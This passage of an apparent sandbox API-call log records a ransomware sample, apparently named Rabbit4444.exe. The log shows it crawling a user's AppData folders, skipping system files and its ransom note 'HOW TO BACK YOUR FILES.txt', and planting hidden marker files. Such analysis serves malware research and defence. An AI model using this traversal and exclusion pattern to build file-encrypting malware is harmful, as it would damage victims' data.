lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.736] FlushFileBuffers (hFile=0x27c) returned 1 [0060.737] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.737] CloseHandle (hObject=0x27c) returned 1 [0060.738] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy") returned 72 [0060.738] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.738] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddb3df96, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a8cfa4e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xed851bdf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0060.738] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.738] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.738] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.738] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.738] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddb3df96, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a8cfa4e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xed851bdf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.738] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.738] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.738] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.738] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.738] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.738] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed851bdf, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed851bdf, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed877d3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.738] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.738] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.738] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd295fed9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xddce1aab, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0060.738] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.738] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.738] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0060.738] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0060.738] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0060.739] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0060.739] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0060.739] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0060.739] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0060.739] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0060.739] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0060.739] lstrcpyW (in: lpString1=0x130ebca, lpString2="AC" | out: lpString1="AC") returned="AC" [0060.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0060.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113f58 [0060.739] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220a8 [0060.739] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddda05d6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2960774, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xddda05d6, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0060.739] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0060.739] lstrcpyW (in: lpString1=0x130ebca, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0060.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0060.739] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x118658 [0060.739] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122128 [0060.739] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2960e32, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xddce1aab, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0060.739] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.739] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.739] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0060.739] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0060.739] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0060.739] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0060.740] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0060.740] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0060.740] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0060.740] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0060.740] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0060.740] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0060.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0060.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118708 [0060.740] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x1220c8 [0060.740] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2961813, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xddc22ee1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0060.740] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0060.740] lstrcpyW (in: lpString1=0x130ebca, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0060.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0060.740] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118868 [0060.740] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x1221a8 [0060.740] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd29620e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xddc22ee1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0060.740] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0060.741] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0060.741] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0060.741] lstrcpyW (in: lpString1=0x130ebca, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0060.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0060.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123b20 [0060.741] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122148 [0060.741] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x713d778b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0060.741] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0060.741] lstrcpyW (in: lpString1=0x130ebca, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0060.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0060.741] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x117e18 [0060.741] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x1222c8 [0060.741] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a85e2a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xddc22ee1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0060.741] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0060.742] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0060.742] lstrcpyW (in: lpString1=0x130ebca, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0060.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0060.742] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa6) returned 0x118de8 [0060.742] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221c8 | out: ListHead=0xf68b0, ListEntry=0x1221c8) returned 0x122308 [0060.742] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a85e2a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xddc22ee1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0060.742] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0060.742] lstrcpyW (in: lpString1=0x130ebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.742] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.742] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.742] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.743] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.743] CloseHandle (hObject=0x2a0) returned 1 [0060.743] CloseHandle (hObject=0x27c) returned 1 [0060.743] GetCurrentThreadId () returned 0xd98 [0060.743] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221c8 [0060.743] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState" [0060.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118de8 | out: hHeap=0xe0000) returned 1 [0060.743] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221c0 | out: hHeap=0xe0000) returned 1 [0060.743] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState" [0060.743] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\" [0060.743] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0060.743] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.752] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.755] FlushFileBuffers (hFile=0x27c) returned 1 [0060.757] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.757] CloseHandle (hObject=0x27c) returned 1 [0060.757] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState") returned 82 [0060.757] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.757] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a85e2a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed877d3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0060.758] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.758] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.758] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.758] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.758] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddc22ee1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a85e2a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed877d3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.758] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.758] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.758] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.758] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.758] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.758] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed877d3b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed877d3b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed89e1dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.758] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.758] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.758] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed877d3b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed877d3b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed89e1dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.758] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0060.758] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.758] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.759] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.759] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.760] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.760] CloseHandle (hObject=0x2a0) returned 1 [0060.760] CloseHandle (hObject=0x27c) returned 1 [0060.760] GetCurrentThreadId () returned 0xd98 [0060.760] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0060.760] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings" [0060.760] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117e18 | out: hHeap=0xe0000) returned 1 [0060.760] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0060.760] lstrcatW (in: lpString1="", 